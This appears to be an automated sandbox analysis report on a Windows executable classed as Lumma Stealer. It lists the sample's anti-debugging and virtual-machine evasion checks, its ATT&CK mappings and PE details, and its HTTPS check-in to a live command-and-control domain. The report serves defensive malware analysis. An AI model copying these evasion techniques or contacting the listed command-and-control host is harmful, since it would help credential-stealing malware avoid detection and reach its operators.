Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E47F second address: 43E4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov dx, 61EAh 0x0000000d push dword ptr [ebp+122D26B8h] 0x00000013 mov edx, eax 0x00000015 call 00007F27492B5209h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F27492B5214h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E4B3 second address: 43E4B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E4B8 second address: 43E4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007F27492B521Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F27492B5206h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E4CE second address: 43E509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 jmp 00007F2749204C37h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop edi 0x0000001f pushad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441187 second address: 44119D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B520Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44119D second address: 4411A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 19C8B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 19C9A0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 37757F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3615EF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3DE4AD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5436Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 396Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1742300907.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742300907.0000000000B69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1742300907.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: file.exe, 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017DF70 LdrInitializeThunk,0_2_0017DF70
Source: file.exe, file.exe, 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: EProgram Manager
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping631
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
Obfuscated Files or Information		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS223
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe100%AviraTR/Crypt.TPM.Gen
file.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tail-cease.cyou/0%Avira URL Cloudsafe
https://tail-cease.cyou/api0%Avira URL Cloudsafe
https://tail-cease.cyou/d0%Avira URL Cloudsafe
https://tail-cease.cyou/b0%Avira URL Cloudsafe
https://tail-cease.cyou:443/apia/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tail-cease.cyou
104.21.93.105
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://tail-cease.cyou/apitrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://tail-cease.cyou/file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://tail-cease.cyou:443/apia/file.exe, 00000000.00000003.1742300907.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B83000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://tail-cease.cyou/dfile.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://tail-cease.cyou/bfile.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    104.21.93.105
    		tail-cease.cyouUnited States
    		13335CLOUDFLARENETUStrue

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1561211
    Start date and time:2024-11-22 22:38:04 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 2m 27s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:1
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:file.exe
    Detection:MAL
    Classification:mal100.evad.winEXE@1/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Stop behavior analysis, all processes terminated

    Warnings

    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: file.exe

    Simulations

    Behavior and APIs

    TimeTypeDescription
    16:39:01API Interceptor2x Sleep call for process: file.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    104.21.93.105https://tracker.club-os.com/campaign/click?msgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=//clickbankbestpick.com/12/12/12/dhytfghj/test.test@test.comGet hashmaliciousHTMLPhisherBrowse
      https://oneweeknoticeperiod.com/iujfndhS/jsdsuefef/new7dbfbfr/elon7maskup/test.test@test.comGet hashmaliciousHTMLPhisherBrowse

        Domains

        No context

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUShttp://www.buildermax.in/002/ww.htmGet hashmaliciousHTMLPhisherBrowse
        • 104.17.25.14
        PDQConnectAgent-4.3.4.msiGet hashmaliciousUnknownBrowse
        • 104.16.77.47
        Installer.exeGet hashmaliciousLummaCBrowse
        • 172.67.155.248
        Installer.exeGet hashmaliciousLummaCBrowse
        • 104.21.66.38
        https://docs.google.com/presentation/d/1z_B5nVWxQSqBMnIWjAfO37AM3HSOm_XjEmM3UM39DA0/previewGet hashmaliciousUnknownBrowse
        • 104.22.78.164
        file.exeGet hashmaliciousLummaC StealerBrowse
        • 172.67.162.84
        setup.exeGet hashmaliciousLummaCBrowse
        • 172.67.135.40
        https://sendbot.me/seuemprestimogarantidoGet hashmaliciousUnknownBrowse
        • 172.67.74.152
        https://sendbot.me/seuemprestimogarantidoGet hashmaliciousUnknownBrowse
        • 172.67.74.152
        8347392490280.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
        • 104.17.25.14

        JA3 Fingerprints

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        a0e9f5d64349fb13191bc781f81f42e1Installer.exeGet hashmaliciousLummaCBrowse
        • 104.21.93.105
        Installer.exeGet hashmaliciousLummaCBrowse
        • 104.21.93.105
        file.exeGet hashmaliciousLummaC StealerBrowse
        • 104.21.93.105
        setup.exeGet hashmaliciousLummaCBrowse
        • 104.21.93.105
        SeT_up.exeGet hashmaliciousLummaC StealerBrowse
        • 104.21.93.105
        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
        • 104.21.93.105
        Setup.exeGet hashmaliciousLummaCBrowse
        • 104.21.93.105
        Set-up.exeGet hashmaliciousLummaCBrowse
        • 104.21.93.105
        Set-up.exeGet hashmaliciousLummaCBrowse
        • 104.21.93.105
        Setup.exeGet hashmaliciousLummaCBrowse
        • 104.21.93.105

        Dropped Files

        No context

        Created / dropped Files

        No created / dropped files found

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.94942929015148
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:file.exe
        File size:1'897'984 bytes
        MD5:8d5f9df92d2fb9c40125d06c7e3c66be
        SHA1:0e90f85e420a9231cefbf51d9cf6f9dddfb42aa7
        SHA256:32ffca83244f63bde5db2ae85aa691a68a2725199ffc4abbcbdab29b9fda8707
        SHA512:89c7c2269776d24f5dc109de9d3a072a87111bfa3cd7900882d7dc01e1ddc790534f4493e19898d02d8284ab80914641faec2acd735bbc5de44738f239fbe422
        SSDEEP:24576:DQo2l2Ty1bxMt2xo+hnzLritdli2aqCr5da0qtMu2LpJBK+GVmnR04PJOhpLnWDn:DQohFao+VwdBN0qtMu2tJxHxPomVN
        TLSH:85953367CBE7A714C39989B044356A3B4710E8FA41D24C2175AFB1384E23982BB97FD7
        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................@K...........@..........................pK.....+.....@.................................\...p..

        File Icon

        Icon Hash:90cececece8e8eb0

        Static PE Info

        General

        Entrypoint:0x8b4000
        Entrypoint Section:.taggant
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
        Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:0
        File Version Major:6
        File Version Minor:0
        Subsystem Version Major:6
        Subsystem Version Minor:0
        Import Hash:2eabe9054cad5152567f0699947a2c5b

        Entrypoint Preview

        Instruction
        jmp 00007F274890E9AAh
        paddq mm3, qword ptr [eax+eax]
        add byte ptr [eax], al
        add byte ptr [eax], al
        jmp 00007F27489109A5h
        add byte ptr [esi], al
        or al, byte ptr [eax]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], dh
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax+eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        and al, byte ptr [eax]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add dword ptr [eax+00000000h], eax
        add byte ptr [eax], al
        adc byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add dword ptr [edx], ecx
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        0x10000x560000x2620023c56bb760a48cfc9924a72f6f1518c3False0.9991995389344263data7.97509167370507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x570000x2b00x2007f6f412337e0d4b586ecb7834bac25c1False0.791015625data5.999501407622915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        0x590000x2b40000x200103874d23beeb69f3380f760f64d1ed1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        jobzmdtd0x30d0000x1a60000x1a560055e2544e7ce616b59cd982974f2e2fa2False0.9945954464550578data7.954231338425638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        izjuqqoh0x4b30000x10000x600c59e0cd6aac20884dfdc4184ec0448a8False0.5618489583333334data4.889124756304121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .taggant0x4b40000x30000x2200ffc756c39b204e9d41e132265b247431False0.07065716911764706DOS executable (COM)0.7934008209522593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

        Resources

        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_MANIFEST0x4b22dc0x256ASCII text, with CRLF line terminators0.5100334448160535

        Imports

        DLLImport
        kernel32.dlllstrcpy

        Network Behavior

        Suricata IDS Alerts

        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2024-11-22T22:39:00.940600+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.93.105443TCP
        2024-11-22T22:39:01.897959+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.93.105443TCP
        2024-11-22T22:39:01.897959+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.93.105443TCP
        2024-11-22T22:39:03.182137+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.93.105443TCP

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Nov 22, 2024 22:38:59.617043972 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:38:59.617078066 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:38:59.617414951 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:38:59.621222973 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:38:59.621237040 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:00.940366030 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:00.940599918 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:00.973649979 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:00.973668098 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:00.973910093 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:01.019774914 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.150022030 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.150074959 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.150115013 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:01.897800922 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:01.897890091 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:01.898107052 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.901232958 CET49730443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.901248932 CET44349730104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:01.960361004 CET49731443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.960433006 CET44349731104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:01.960737944 CET49731443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.961029053 CET49731443192.168.2.4104.21.93.105
        Nov 22, 2024 22:39:01.961050034 CET44349731104.21.93.105192.168.2.4
        Nov 22, 2024 22:39:03.182137012 CET49731443192.168.2.4104.21.93.105

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Nov 22, 2024 22:38:59.168389082 CET5093753192.168.2.41.1.1.1
        Nov 22, 2024 22:38:59.609025955 CET53509371.1.1.1192.168.2.4

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Nov 22, 2024 22:38:59.168389082 CET192.168.2.41.1.1.10xee96Standard query (0)tail-cease.cyouA (IP address)IN (0x0001)false

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Nov 22, 2024 22:38:59.609025955 CET1.1.1.1192.168.2.40xee96No error (0)tail-cease.cyou104.21.93.105A (IP address)IN (0x0001)false
        Nov 22, 2024 22:38:59.609025955 CET1.1.1.1192.168.2.40xee96No error (0)tail-cease.cyou172.67.208.213A (IP address)IN (0x0001)false

        HTTP Request Dependency Graph

        • tail-cease.cyou

        HTTPS Proxied Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.449730104.21.93.1054437044C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        2024-11-22 21:39:01 UTC262OUTPOST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: tail-cease.cyou
        2024-11-22 21:39:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
        Data Ascii: act=life
        2024-11-22 21:39:01 UTC1003INHTTP/1.1 200 OK
        Date: Fri, 22 Nov 2024 21:39:01 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=cjatrnfm73551kusi4rvclg1en; expires=Tue, 18-Mar-2025 15:25:40 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        cf-cache-status: DYNAMIC
        vary: accept-encoding
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQG5lyhPLAejNHnFsPBfoCvppyNZwxsv33HwFCWHjCwc0sIhjBSVaVo9mM23TAq71a6hF3mIRYWOqsM9ajIRPJmewXkzq7NLif9BSVY8BiMkV8JRrW2hamDpcon7RQWmrRA%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8e6c11dd3c45c44f-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1508&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1888745&cwnd=251&unsent_bytes=0&cid=b2b5cb8cc6b765a4&ts=972&x=0"
        2024-11-22 21:39:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
        Data Ascii: 2ok
        2024-11-22 21:39:01 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        General

        Target ID:0
        Start time:16:38:54
        Start date:22/11/2024
        Path:C:\Users\user\Desktop\file.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\file.exe"
        Imagebase:0x140000
        File size:1'897'984 bytes
        MD5 hash:8D5F9DF92D2FB9C40125D06C7E3C66BE
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Disassembly

        Reset < >

          Execution Graph

          Execution Coverage:2.9%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:55.2%
          Total number of Nodes:58
          Total number of Limit Nodes:1
